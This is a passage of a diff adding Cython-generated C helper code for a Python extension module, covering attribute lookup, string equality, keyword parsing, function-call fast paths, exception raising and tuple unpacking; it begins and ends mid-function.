tstate->curexc_type; + *value = tstate->curexc_value; + *tb = tstate->curexc_traceback; + tstate->curexc_type = 0; + tstate->curexc_value = 0; + tstate->curexc_traceback = 0; +#endif +} +#endif + +/* PyObjectGetAttrStr */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStr(PyObject* obj, PyObject* attr_name) { + PyTypeObject* tp = Py_TYPE(obj); + if (likely(tp->tp_getattro)) + return tp->tp_getattro(obj, attr_name); +#if PY_MAJOR_VERSION < 3 + if (likely(tp->tp_getattr)) + return tp->tp_getattr(obj, PyString_AS_STRING(attr_name)); +#endif + return PyObject_GetAttr(obj, attr_name); +} +#endif + +/* PyObjectGetAttrStrNoError */ +static void __Pyx_PyObject_GetAttrStr_ClearAttributeError(void) { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + if (likely(__Pyx_PyErr_ExceptionMatches(PyExc_AttributeError))) + __Pyx_PyErr_Clear(); +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStrNoError(PyObject* obj, PyObject* attr_name) { + PyObject *result; +#if CYTHON_COMPILING_IN_CPYTHON && CYTHON_USE_TYPE_SLOTS && PY_VERSION_HEX >= 0x030700B1 + PyTypeObject* tp = Py_TYPE(obj); + if (likely(tp->tp_getattro == PyObject_GenericGetAttr)) { + return _PyObject_GenericGetAttrWithDict(obj, attr_name, NULL, 1); + } +#endif + result = __Pyx_PyObject_GetAttrStr(obj, attr_name); + if (unlikely(!result)) { + __Pyx_PyObject_GetAttrStr_ClearAttributeError(); + } + return result; +} + +/* GetBuiltinName */ +static PyObject *__Pyx_GetBuiltinName(PyObject *name) { + PyObject* result = __Pyx_PyObject_GetAttrStrNoError(__pyx_b, name); + if (unlikely(!result) && !PyErr_Occurred()) { + PyErr_Format(PyExc_NameError, +#if PY_MAJOR_VERSION >= 3 + "name '%U' is not defined", name); +#else + "name '%.200s' is not defined", PyString_AS_STRING(name)); +#endif + } + return result; +} + +/* TupleAndListFromArray */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE void __Pyx_copy_object_array(PyObject *const *CYTHON_RESTRICT src, PyObject** CYTHON_RESTRICT dest, Py_ssize_t length) { + PyObject *v; + Py_ssize_t i; + for (i = 0; i < length; i++) { + v = dest[i] = src[i]; + Py_INCREF(v); + } +} +static CYTHON_INLINE PyObject * +__Pyx_PyTuple_FromArray(PyObject *const *src, Py_ssize_t n) +{ + PyObject *res; + if (n <= 0) { + Py_INCREF(__pyx_empty_tuple); + return __pyx_empty_tuple; + } + res = PyTuple_New(n); + if (unlikely(res == NULL)) return NULL; + __Pyx_copy_object_array(src, ((PyTupleObject*)res)->ob_item, n); + return res; +} +static CYTHON_INLINE PyObject * +__Pyx_PyList_FromArray(PyObject *const *src, Py_ssize_t n) +{ + PyObject *res; + if (n <= 0) { + return PyList_New(0); + } + res = PyList_New(n); + if (unlikely(res == NULL)) return NULL; + __Pyx_copy_object_array(src, ((PyListObject*)res)->ob_item, n); + return res; +} +#endif + +/* BytesEquals */ +static CYTHON_INLINE int __Pyx_PyBytes_Equals(PyObject* s1, PyObject* s2, int equals) { +#if CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API + return PyObject_RichCompareBool(s1, s2, equals); +#else + if (s1 == s2) { + return (equals == Py_EQ); + } else if (PyBytes_CheckExact(s1) & PyBytes_CheckExact(s2)) { + const char *ps1, *ps2; + Py_ssize_t length = PyBytes_GET_SIZE(s1); + if (length != PyBytes_GET_SIZE(s2)) + return (equals == Py_NE); + ps1 = PyBytes_AS_STRING(s1); + ps2 = PyBytes_AS_STRING(s2); + if (ps1[0] != ps2[0]) { + return (equals == Py_NE); + } else if (length == 1) { + return (equals == Py_EQ); + } else { + int result; +#if CYTHON_USE_UNICODE_INTERNALS && (PY_VERSION_HEX < 0x030B0000) + Py_hash_t hash1, hash2; + hash1 = ((PyBytesObject*)s1)->ob_shash; + hash2 = ((PyBytesObject*)s2)->ob_shash; + if (hash1 != hash2 && hash1 != -1 && hash2 != -1) { + return (equals == Py_NE); + } +#endif + result = memcmp(ps1, ps2, (size_t)length); + return (equals == Py_EQ) ? (result == 0) : (result != 0); + } + } else if ((s1 == Py_None) & PyBytes_CheckExact(s2)) { + return (equals == Py_NE); + } else if ((s2 == Py_None) & PyBytes_CheckExact(s1)) { + return (equals == Py_NE); + } else { + int result; + PyObject* py_result = PyObject_RichCompare(s1, s2, equals); + if (!py_result) + return -1; + result = __Pyx_PyObject_IsTrue(py_result); + Py_DECREF(py_result); + return result; + } +#endif +} + +/* UnicodeEquals */ +static CYTHON_INLINE int __Pyx_PyUnicode_Equals(PyObject* s1, PyObject* s2, int equals) { +#if CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API + return PyObject_RichCompareBool(s1, s2, equals); +#else +#if PY_MAJOR_VERSION < 3 + PyObject* owned_ref = NULL; +#endif + int s1_is_unicode, s2_is_unicode; + if (s1 == s2) { + goto return_eq; + } + s1_is_unicode = PyUnicode_CheckExact(s1); + s2_is_unicode = PyUnicode_CheckExact(s2); +#if PY_MAJOR_VERSION < 3 + if ((s1_is_unicode & (!s2_is_unicode)) && PyString_CheckExact(s2)) { + owned_ref = PyUnicode_FromObject(s2); + if (unlikely(!owned_ref)) + return -1; + s2 = owned_ref; + s2_is_unicode = 1; + } else if ((s2_is_unicode & (!s1_is_unicode)) && PyString_CheckExact(s1)) { + owned_ref = PyUnicode_FromObject(s1); + if (unlikely(!owned_ref)) + return -1; + s1 = owned_ref; + s1_is_unicode = 1; + } else if (((!s2_is_unicode) & (!s1_is_unicode))) { + return __Pyx_PyBytes_Equals(s1, s2, equals); + } +#endif + if (s1_is_unicode & s2_is_unicode) { + Py_ssize_t length; + int kind; + void *data1, *data2; + if (unlikely(__Pyx_PyUnicode_READY(s1) < 0) || unlikely(__Pyx_PyUnicode_READY(s2) < 0)) + return -1; + length = __Pyx_PyUnicode_GET_LENGTH(s1); + if (length != __Pyx_PyUnicode_GET_LENGTH(s2)) { + goto return_ne; + } +#if CYTHON_USE_UNICODE_INTERNALS + { + Py_hash_t hash1, hash2; + #if CYTHON_PEP393_ENABLED + hash1 = ((PyASCIIObject*)s1)->hash; + hash2 = ((PyASCIIObject*)s2)->hash; + #else + hash1 = ((PyUnicodeObject*)s1)->hash; + hash2 = ((PyUnicodeObject*)s2)->hash; + #endif + if (hash1 != hash2 && hash1 != -1 && hash2 != -1) { + goto return_ne; + } + } +#endif + kind = __Pyx_PyUnicode_KIND(s1); + if (kind != __Pyx_PyUnicode_KIND(s2)) { + goto return_ne; + } + data1 = __Pyx_PyUnicode_DATA(s1); + data2 = __Pyx_PyUnicode_DATA(s2); + if (__Pyx_PyUnicode_READ(kind, data1, 0) != __Pyx_PyUnicode_READ(kind, data2, 0)) { + goto return_ne; + } else if (length == 1) { + goto return_eq; + } else { + int result = memcmp(data1, data2, (size_t)(length * kind)); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_EQ) ? (result == 0) : (result != 0); + } + } else if ((s1 == Py_None) & s2_is_unicode) { + goto return_ne; + } else if ((s2 == Py_None) & s1_is_unicode) { + goto return_ne; + } else { + int result; + PyObject* py_result = PyObject_RichCompare(s1, s2, equals); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + if (!py_result) + return -1; + result = __Pyx_PyObject_IsTrue(py_result); + Py_DECREF(py_result); + return result; + } +return_eq: + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_EQ); +return_ne: + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_NE); +#endif +} + +/* fastcall */ +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE PyObject * __Pyx_GetKwValue_FASTCALL(PyObject *kwnames, PyObject *const *kwvalues, PyObject *s) +{ + Py_ssize_t i, n = PyTuple_GET_SIZE(kwnames); + for (i = 0; i < n; i++) + { + if (s == PyTuple_GET_ITEM(kwnames, i)) return kwvalues[i]; + } + for (i = 0; i < n; i++) + { + int eq = __Pyx_PyUnicode_Equals(s, PyTuple_GET_ITEM(kwnames, i), Py_EQ); + if (unlikely(eq != 0)) { + if (unlikely(eq < 0)) return NULL; // error + return kwvalues[i]; + } + } + return NULL; // not found (no exception set) +} +#endif + +/* RaiseDoubleKeywords */ +static void __Pyx_RaiseDoubleKeywordsError( + const char* func_name, + PyObject* kw_name) +{ + PyErr_Format(PyExc_TypeError, + #if PY_MAJOR_VERSION >= 3 + "%s() got multiple values for keyword argument '%U'", func_name, kw_name); + #else + "%s() got multiple values for keyword argument '%s'", func_name, + PyString_AsString(kw_name)); + #endif +} + +/* ParseKeywords */ +static int __Pyx_ParseOptionalKeywords( + PyObject *kwds, + PyObject *const *kwvalues, + PyObject **argnames[], + PyObject *kwds2, + PyObject *values[], + Py_ssize_t num_pos_args, + const char* function_name) +{ + PyObject *key = 0, *value = 0; + Py_ssize_t pos = 0; + PyObject*** name; + PyObject*** first_kw_arg = argnames + num_pos_args; + int kwds_is_tuple = CYTHON_METH_FASTCALL && likely(PyTuple_Check(kwds)); + while (1) { + if (kwds_is_tuple) { + if (pos >= PyTuple_GET_SIZE(kwds)) break; + key = PyTuple_GET_ITEM(kwds, pos); + value = kwvalues[pos]; + pos++; + } + else + { + if (!PyDict_Next(kwds, &pos, &key, &value)) break; + } + name = first_kw_arg; + while (*name && (**name != key)) name++; + if (*name) { + values[name-argnames] = value; + continue; + } + name = first_kw_arg; + #if PY_MAJOR_VERSION < 3 + if (likely(PyString_Check(key))) { + while (*name) { + if ((CYTHON_COMPILING_IN_PYPY || PyString_GET_SIZE(**name) == PyString_GET_SIZE(key)) + && _PyString_Eq(**name, key)) { + values[name-argnames] = value; + break; + } + name++; + } + if (*name) continue; + else { + PyObject*** argname = argnames; + while (argname != first_kw_arg) { + if ((**argname == key) || ( + (CYTHON_COMPILING_IN_PYPY || PyString_GET_SIZE(**argname) == PyString_GET_SIZE(key)) + && _PyString_Eq(**argname, key))) { + goto arg_passed_twice; + } + argname++; + } + } + } else + #endif + if (likely(PyUnicode_Check(key))) { + while (*name) { + int cmp = ( + #if !CYTHON_COMPILING_IN_PYPY && PY_MAJOR_VERSION >= 3 + (__Pyx_PyUnicode_GET_LENGTH(**name) != __Pyx_PyUnicode_GET_LENGTH(key)) ? 1 : + #endif + PyUnicode_Compare(**name, key) + ); + if (cmp < 0 && unlikely(PyErr_Occurred())) goto bad; + if (cmp == 0) { + values[name-argnames] = value; + break; + } + name++; + } + if (*name) continue; + else { + PyObject*** argname = argnames; + while (argname != first_kw_arg) { + int cmp = (**argname == key) ? 0 : + #if !CYTHON_COMPILING_IN_PYPY && PY_MAJOR_VERSION >= 3 + (__Pyx_PyUnicode_GET_LENGTH(**argname) != __Pyx_PyUnicode_GET_LENGTH(key)) ? 1 : + #endif + PyUnicode_Compare(**argname, key); + if (cmp < 0 && unlikely(PyErr_Occurred())) goto bad; + if (cmp == 0) goto arg_passed_twice; + argname++; + } + } + } else + goto invalid_keyword_type; + if (kwds2) { + if (unlikely(PyDict_SetItem(kwds2, key, value))) goto bad; + } else { + goto invalid_keyword; + } + } + return 0; +arg_passed_twice: + __Pyx_RaiseDoubleKeywordsError(function_name, key); + goto bad; +invalid_keyword_type: + PyErr_Format(PyExc_TypeError, + "%.200s() keywords must be strings", function_name); + goto bad; +invalid_keyword: + #if PY_MAJOR_VERSION < 3 + PyErr_Format(PyExc_TypeError, + "%.200s() got an unexpected keyword argument '%.200s'", + function_name, PyString_AsString(key)); + #else + PyErr_Format(PyExc_TypeError, + "%s() got an unexpected keyword argument '%U'", + function_name, key); + #endif +bad: + return -1; +} + +/* RaiseArgTupleInvalid */ +static void __Pyx_RaiseArgtupleInvalid( + const char* func_name, + int exact, + Py_ssize_t num_min, + Py_ssize_t num_max, + Py_ssize_t num_found) +{ + Py_ssize_t num_expected; + const char *more_or_less; + if (num_found < num_min) { + num_expected = num_min; + more_or_less = "at least"; + } else { + num_expected = num_max; + more_or_less = "at most"; + } + if (exact) { + more_or_less = "exactly"; + } + PyErr_Format(PyExc_TypeError, + "%.200s() takes %.8s %" CYTHON_FORMAT_SSIZE_T "d positional argument%.1s (%" CYTHON_FORMAT_SSIZE_T "d given)", + func_name, more_or_less, num_expected, + (num_expected == 1) ? "" : "s", num_found); +} + +/* PyFunctionFastCall */ +#if CYTHON_FAST_PYCALL && !CYTHON_VECTORCALL +static PyObject* __Pyx_PyFunction_FastCallNoKw(PyCodeObject *co, PyObject **args, Py_ssize_t na, + PyObject *globals) { + PyFrameObject *f; + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject **fastlocals; + Py_ssize_t i; + PyObject *result; + assert(globals != NULL); + /* XXX Perhaps we should create a specialized + PyFrame_New() that doesn't take locals, but does + take builtins without sanity checking them. + */ + assert(tstate != NULL); + f = PyFrame_New(tstate, co, globals, NULL); + if (f == NULL) { + return NULL; + } + fastlocals = __Pyx_PyFrame_GetLocalsplus(f); + for (i = 0; i < na; i++) { + Py_INCREF(*args); + fastlocals[i] = *args++; + } + result = PyEval_EvalFrameEx(f,0); + ++tstate->recursion_depth; + Py_DECREF(f); + --tstate->recursion_depth; + return result; +} +static PyObject *__Pyx_PyFunction_FastCallDict(PyObject *func, PyObject **args, Py_ssize_t nargs, PyObject *kwargs) { + PyCodeObject *co = (PyCodeObject *)PyFunction_GET_CODE(func); + PyObject *globals = PyFunction_GET_GLOBALS(func); + PyObject *argdefs = PyFunction_GET_DEFAULTS(func); + PyObject *closure; +#if PY_MAJOR_VERSION >= 3 + PyObject *kwdefs; +#endif + PyObject *kwtuple, **k; + PyObject **d; + Py_ssize_t nd; + Py_ssize_t nk; + PyObject *result; + assert(kwargs == NULL || PyDict_Check(kwargs)); + nk = kwargs ? PyDict_Size(kwargs) : 0; + if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) { + return NULL; + } + if ( +#if PY_MAJOR_VERSION >= 3 + co->co_kwonlyargcount == 0 && +#endif + likely(kwargs == NULL || nk == 0) && + co->co_flags == (CO_OPTIMIZED | CO_NEWLOCALS | CO_NOFREE)) { + if (argdefs == NULL && co->co_argcount == nargs) { + result = __Pyx_PyFunction_FastCallNoKw(co, args, nargs, globals); + goto done; + } + else if (nargs == 0 && argdefs != NULL + && co->co_argcount == Py_SIZE(argdefs)) { + /* function called with no arguments, but all parameters have + a default value: use default values as arguments .*/ + args = &PyTuple_GET_ITEM(argdefs, 0); + result =__Pyx_PyFunction_FastCallNoKw(co, args, Py_SIZE(argdefs), globals); + goto done; + } + } + if (kwargs != NULL) { + Py_ssize_t pos, i; + kwtuple = PyTuple_New(2 * nk); + if (kwtuple == NULL) { + result = NULL; + goto done; + } + k = &PyTuple_GET_ITEM(kwtuple, 0); + pos = i = 0; + while (PyDict_Next(kwargs, &pos, &k[i], &k[i+1])) { + Py_INCREF(k[i]); + Py_INCREF(k[i+1]); + i += 2; + } + nk = i / 2; + } + else { + kwtuple = NULL; + k = NULL; + } + closure = PyFunction_GET_CLOSURE(func); +#if PY_MAJOR_VERSION >= 3 + kwdefs = PyFunction_GET_KW_DEFAULTS(func); +#endif + if (argdefs != NULL) { + d = &PyTuple_GET_ITEM(argdefs, 0); + nd = Py_SIZE(argdefs); + } + else { + d = NULL; + nd = 0; + } +#if PY_MAJOR_VERSION >= 3 + result = PyEval_EvalCodeEx((PyObject*)co, globals, (PyObject *)NULL, + args, (int)nargs, + k, (int)nk, + d, (int)nd, kwdefs, closure); +#else + result = PyEval_EvalCodeEx(co, globals, (PyObject *)NULL, + args, (int)nargs, + k, (int)nk, + d, (int)nd, closure); +#endif + Py_XDECREF(kwtuple); +done: + Py_LeaveRecursiveCall(); + return result; +} +#endif + +/* PyObjectCall */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_Call(PyObject *func, PyObject *arg, PyObject *kw) { + PyObject *result; + ternaryfunc call = Py_TYPE(func)->tp_call; + if (unlikely(!call)) + return PyObject_Call(func, arg, kw); + if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) + return NULL; + result = (*call)(func, arg, kw); + Py_LeaveRecursiveCall(); + if (unlikely(!result) && unlikely(!PyErr_Occurred())) { + PyErr_SetString( + PyExc_SystemError, + "NULL result without error in PyObject_Call"); + } + return result; +} +#endif + +/* PyObjectCallMethO */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallMethO(PyObject *func, PyObject *arg) { + PyObject *self, *result; + PyCFunction cfunc; + cfunc = PyCFunction_GET_FUNCTION(func); + self = PyCFunction_GET_SELF(func); + if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) + return NULL; + result = cfunc(self, arg); + Py_LeaveRecursiveCall(); + if (unlikely(!result) && unlikely(!PyErr_Occurred())) { + PyErr_SetString( + PyExc_SystemError, + "NULL result without error in PyObject_Call"); + } + return result; +} +#endif + +/* PyObjectFastCall */ +static PyObject* __Pyx_PyObject_FastCall_fallback(PyObject *func, PyObject **args, size_t nargs, PyObject *kwargs) { + PyObject *argstuple; + PyObject *result; + size_t i; + argstuple = PyTuple_New((Py_ssize_t)nargs); + if (unlikely(!argstuple)) return NULL; + for (i = 0; i < nargs; i++) { + Py_INCREF(args[i]); + PyTuple_SET_ITEM(argstuple, (Py_ssize_t)i, args[i]); + } + result = __Pyx_PyObject_Call(func, argstuple, kwargs); + Py_DECREF(argstuple); + return result; +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_FastCallDict(PyObject *func, PyObject **args, size_t _nargs, PyObject *kwargs) { + Py_ssize_t nargs = __Pyx_PyVectorcall_NARGS(_nargs); +#if CYTHON_COMPILING_IN_CPYTHON + if (nargs == 0 && kwargs == NULL) { +#if defined(__Pyx_CyFunction_USED) && defined(NDEBUG) + if (__Pyx_IsCyOrPyCFunction(func)) +#else + if (PyCFunction_Check(func)) +#endif + { + if (likely(PyCFunction_GET_FLAGS(func) & METH_NOARGS)) { + return __Pyx_PyObject_CallMethO(func, NULL); + } + } + } + else if (nargs == 1 && kwargs == NULL) { + if (PyCFunction_Check(func)) + { + if (likely(PyCFunction_GET_FLAGS(func) & METH_O)) { + return __Pyx_PyObject_CallMethO(func, args[0]); + } + } + } +#endif + #if PY_VERSION_HEX < 0x030800B1 + #if CYTHON_FAST_PYCCALL + if (PyCFunction_Check(func)) { + if (kwargs) { + return _PyCFunction_FastCallDict(func, args, nargs, kwargs); + } else { + return _PyCFunction_FastCallKeywords(func, args, nargs, NULL); + } + } + #if PY_VERSION_HEX >= 0x030700A1 + if (!kwargs && __Pyx_IS_TYPE(func, &PyMethodDescr_Type)) { + return _PyMethodDescr_FastCallKeywords(func, args, nargs, NULL); + } + #endif + #endif + #if CYTHON_FAST_PYCALL + if (PyFunction_Check(func)) { + return __Pyx_PyFunction_FastCallDict(func, args, nargs, kwargs); + } + #endif + #endif + #if CYTHON_VECTORCALL + vectorcallfunc f = _PyVectorcall_Function(func); + if (f) { + return f(func, args, (size_t)nargs, kwargs); + } + #elif defined(__Pyx_CyFunction_USED) && CYTHON_BACKPORT_VECTORCALL + if (__Pyx_CyFunction_CheckExact(func)) { + __pyx_vectorcallfunc f = __Pyx_CyFunction_func_vectorcall(func); + if (f) return f(func, args, (size_t)nargs, kwargs); + } + #endif + if (nargs == 0) { + return __Pyx_PyObject_Call(func, __pyx_empty_tuple, kwargs); + } + return __Pyx_PyObject_FastCall_fallback(func, args, (size_t)nargs, kwargs); +} + +/* PyObjectCallOneArg */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallOneArg(PyObject *func, PyObject *arg) { + PyObject *args[2] = {NULL, arg}; + return __Pyx_PyObject_FastCall(func, args+1, 1 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); +} + +/* RaiseException */ +#if PY_MAJOR_VERSION < 3 +static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause) { + __Pyx_PyThreadState_declare + CYTHON_UNUSED_VAR(cause); + Py_XINCREF(type); + if (!value || value == Py_None) + value = NULL; + else + Py_INCREF(value); + if (!tb || tb == Py_None) + tb = NULL; + else { + Py_INCREF(tb); + if (!PyTraceBack_Check(tb)) { + PyErr_SetString(PyExc_TypeError, + "raise: arg 3 must be a traceback or None"); + goto raise_error; + } + } + if (PyType_Check(type)) { +#if CYTHON_COMPILING_IN_PYPY + if (!value) { + Py_INCREF(Py_None); + value = Py_None; + } +#endif + PyErr_NormalizeException(&type, &value, &tb); + } else { + if (value) { + PyErr_SetString(PyExc_TypeError, + "instance exception may not have a separate value"); + goto raise_error; + } + value = type; + type = (PyObject*) Py_TYPE(type); + Py_INCREF(type); + if (!PyType_IsSubtype((PyTypeObject *)type, (PyTypeObject *)PyExc_BaseException)) { + PyErr_SetString(PyExc_TypeError, + "raise: exception class must be a subclass of BaseException"); + goto raise_error; + } + } + __Pyx_PyThreadState_assign + __Pyx_ErrRestore(type, value, tb); + return; +raise_error: + Py_XDECREF(value); + Py_XDECREF(type); + Py_XDECREF(tb); + return; +} +#else +static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause) { + PyObject* owned_instance = NULL; + if (tb == Py_None) { + tb = 0; + } else if (tb && !PyTraceBack_Check(tb)) { + PyErr_SetString(PyExc_TypeError, + "raise: arg 3 must be a traceback or None"); + goto bad; + } + if (value == Py_None) + value = 0; + if (PyExceptionInstance_Check(type)) { + if (value) { + PyErr_SetString(PyExc_TypeError, + "instance exception may not have a separate value"); + goto bad; + } + value = type; + type = (PyObject*) Py_TYPE(value); + } else if (PyExceptionClass_Check(type)) { + PyObject *instance_class = NULL; + if (value && PyExceptionInstance_Check(value)) { + instance_class = (PyObject*) Py_TYPE(value); + if (instance_class != type) { + int is_subclass = PyObject_IsSubclass(instance_class, type); + if (!is_subclass) { + instance_class = NULL; + } else if (unlikely(is_subclass == -1)) { + goto bad; + } else { + type = instance_class; + } + } + } + if (!instance_class) { + PyObject *args; + if (!value) + args = PyTuple_New(0); + else if (PyTuple_Check(value)) { + Py_INCREF(value); + args = value; + } else + args = PyTuple_Pack(1, value); + if (!args) + goto bad; + owned_instance = PyObject_Call(type, args, NULL); + Py_DECREF(args); + if (!owned_instance) + goto bad; + value = owned_instance; + if (!PyExceptionInstance_Check(value)) { + PyErr_Format(PyExc_TypeError, + "calling %R should have returned an instance of " + "BaseException, not %R", + type, Py_TYPE(value)); + goto bad; + } + } + } else { + PyErr_SetString(PyExc_TypeError, + "raise: exception class must be a subclass of BaseException"); + goto bad; + } + if (cause) { + PyObject *fixed_cause; + if (cause == Py_None) { + fixed_cause = NULL; + } else if (PyExceptionClass_Check(cause)) { + fixed_cause = PyObject_CallObject(cause, NULL); + if (fixed_cause == NULL) + goto bad; + } else if (PyExceptionInstance_Check(cause)) { + fixed_cause = cause; + Py_INCREF(fixed_cause); + } else { + PyErr_SetString(PyExc_TypeError, + "exception causes must derive from " + "BaseException"); + goto bad; + } + PyException_SetCause(value, fixed_cause); + } + PyErr_SetObject(type, value); + if (tb) { + #if PY_VERSION_HEX >= 0x030C00A6 + PyException_SetTraceback(value, tb); + #elif CYTHON_FAST_THREAD_STATE + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject* tmp_tb = tstate->curexc_traceback; + if (tb != tmp_tb) { + Py_INCREF(tb); + tstate->curexc_traceback = tb; + Py_XDECREF(tmp_tb); + } +#else + PyObject *tmp_type, *tmp_value, *tmp_tb; + PyErr_Fetch(&tmp_type, &tmp_value, &tmp_tb); + Py_INCREF(tb); + PyErr_Restore(tmp_type, tmp_value, tb); + Py_XDECREF(tmp_tb); +#endif + } +bad: + Py_XDECREF(owned_instance); + return; +} +#endif + +/* IterFinish */ +static CYTHON_INLINE int __Pyx_IterFinish(void) { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + PyObject* exc_type = __Pyx_PyErr_CurrentExceptionType(); + if (unlikely(exc_type)) { + if (unlikely(!__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) + return -1; + __Pyx_PyErr_Clear(); + return 0; + } + return 0; +} + +/* PyObjectCallNoArg */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallNoArg(PyObject *func) { + PyObject *arg = NULL; + return __Pyx_PyObject_FastCall(func, (&arg)+1, 0 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); +} + +/* PyObjectGetMethod */ +static int __Pyx_PyObject_GetMethod(PyObject *obj, PyObject *name, PyObject **method) { + PyObject *attr; +#if CYTHON_UNPACK_METHODS && CYTHON_COMPILING_IN_CPYTHON && CYTHON_USE_PYTYPE_LOOKUP + __Pyx_TypeName type_name; + PyTypeObject *tp = Py_TYPE(obj); + PyObject *descr; + descrgetfunc f = NULL; + PyObject **dictptr, *dict; + int meth_found = 0; + assert (*method == NULL); + if (unlikely(tp->tp_getattro != PyObject_GenericGetAttr)) { + attr = __Pyx_PyObject_GetAttrStr(obj, name); + goto try_unpack; + } + if (unlikely(tp->tp_dict == NULL) && unlikely(PyType_Ready(tp) < 0)) { + return 0; + } + descr = _PyType_Lookup(tp, name); + if (likely(descr != NULL)) { + Py_INCREF(descr); +#if defined(Py_TPFLAGS_METHOD_DESCRIPTOR) && Py_TPFLAGS_METHOD_DESCRIPTOR + if (__Pyx_PyType_HasFeature(Py_TYPE(descr), Py_TPFLAGS_METHOD_DESCRIPTOR)) +#elif PY_MAJOR_VERSION >= 3 + #ifdef __Pyx_CyFunction_USED + if (likely(PyFunction_Check(descr) || __Pyx_IS_TYPE(descr, &PyMethodDescr_Type) || __Pyx_CyFunction_Check(descr))) + #else + if (likely(PyFunction_Check(descr) || __Pyx_IS_TYPE(descr, &PyMethodDescr_Type))) + #endif +#else + #ifdef __Pyx_CyFunction_USED + if (likely(PyFunction_Check(descr) || __Pyx_CyFunction_Check(descr))) + #else + if (likely(PyFunction_Check(descr))) + #endif +#endif + { + meth_found = 1; + } else { + f = Py_TYPE(descr)->tp_descr_get; + if (f != NULL && PyDescr_IsData(descr)) { + attr = f(descr, obj, (PyObject *)Py_TYPE(obj)); + Py_DECREF(descr); + goto try_unpack; + } + } + } + dictptr = _PyObject_GetDictPtr(obj); + if (dictptr != NULL && (dict = *dictptr) != NULL) { + Py_INCREF(dict); + attr = __Pyx_PyDict_GetItemStr(dict, name); + if (attr != NULL) { + Py_INCREF(attr); + Py_DECREF(dict); + Py_XDECREF(descr); + goto try_unpack; + } + Py_DECREF(dict); + } + if (meth_found) { + *method = descr; + return 1; + } + if (f != NULL) { + attr = f(descr, obj, (PyObject *)Py_TYPE(obj)); + Py_DECREF(descr); + goto try_unpack; + } + if (likely(descr != NULL)) { + *method = descr; + return 0; + } + type_name = __Pyx_PyType_GetName(tp); + PyErr_Format(PyExc_AttributeError, +#if PY_MAJOR_VERSION >= 3 + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%U'", + type_name, name); +#else + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%.400s'", + type_name, PyString_AS_STRING(name)); +#endif + __Pyx_DECREF_TypeName(type_name); + return 0; +#else + attr = __Pyx_PyObject_GetAttrStr(obj, name); + goto try_unpack; +#endif +try_unpack: +#if CYTHON_UNPACK_METHODS + if (likely(attr) && PyMethod_Check(attr) && likely(PyMethod_GET_SELF(attr) == obj)) { + PyObject *function = PyMethod_GET_FUNCTION(attr); + Py_INCREF(function); + Py_DECREF(attr); + *method = function; + return 1; + } +#endif + *method = attr; + return 0; +} + +/* PyObjectCallMethod0 */ +static PyObject* __Pyx_PyObject_CallMethod0(PyObject* obj, PyObject* method_name) { + PyObject *method = NULL, *result = NULL; + int is_method = __Pyx_PyObject_GetMethod(obj, method_name, &method); + if (likely(is_method)) { + result = __Pyx_PyObject_CallOneArg(method, obj); + Py_DECREF(method); + return result; + } + if (unlikely(!method)) goto bad; + result = __Pyx_PyObject_CallNoArg(method); + Py_DECREF(method); +bad: + return result; +} + +/* RaiseNeedMoreValuesToUnpack */ +static CYTHON_INLINE void __Pyx_RaiseNeedMoreValuesError(Py_ssize_t index) { + PyErr_Format(PyExc_ValueError, + "need more than %" CYTHON_FORMAT_SSIZE_T "d value%.1s to unpack", + index, (index == 1) ? "" : "s"); +} + +/* RaiseTooManyValuesToUnpack */ +static CYTHON_INLINE void __Pyx_RaiseTooManyValuesError(Py_ssize_t expected) { + PyErr_Format(PyExc_ValueError, + "too many values to unpack (expected %" CYTHON_FORMAT_SSIZE_T "d)", expected); +} + +/* UnpackItemEndCheck */ +static int __Pyx_IternextUnpackEndCheck(PyObject *retval, Py_ssize_t expected) { + if (unlikely(retval)) { + Py_DECREF(retval); + __Pyx_RaiseTooManyValuesError(expected); + return -1; + } + return __Pyx_IterFinish(); +} + +/* RaiseNoneIterError */ +static CYTHON_INLINE void __Pyx_RaiseNoneNotIterableError(void) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not iterable"); +} + +/* UnpackTupleError */ +static void __Pyx_UnpackTupleError(PyObject *t, Py_ssize_t index) { + if (t == Py_None) { + __Pyx_RaiseNoneNotIterableError(); + } else if (PyTuple_GET_SIZE(t) < index) { + __Pyx_RaiseNeedMoreValuesError(PyTuple_GET_SIZE(t)); + } else { + __Pyx_RaiseTooManyValuesError(index); + } +} + +/* UnpackTuple2 */ +static CYTHON_INLINE int __Pyx_unpack_tuple2_exact( + PyObject* tuple, PyObject** pvalue1, PyObject** pvalue2, int decref_tuple) { + PyObject *value1 = NULL, *value2 = NULL; +#if CYTHON_COMPILING_IN_PYPY + value1 = 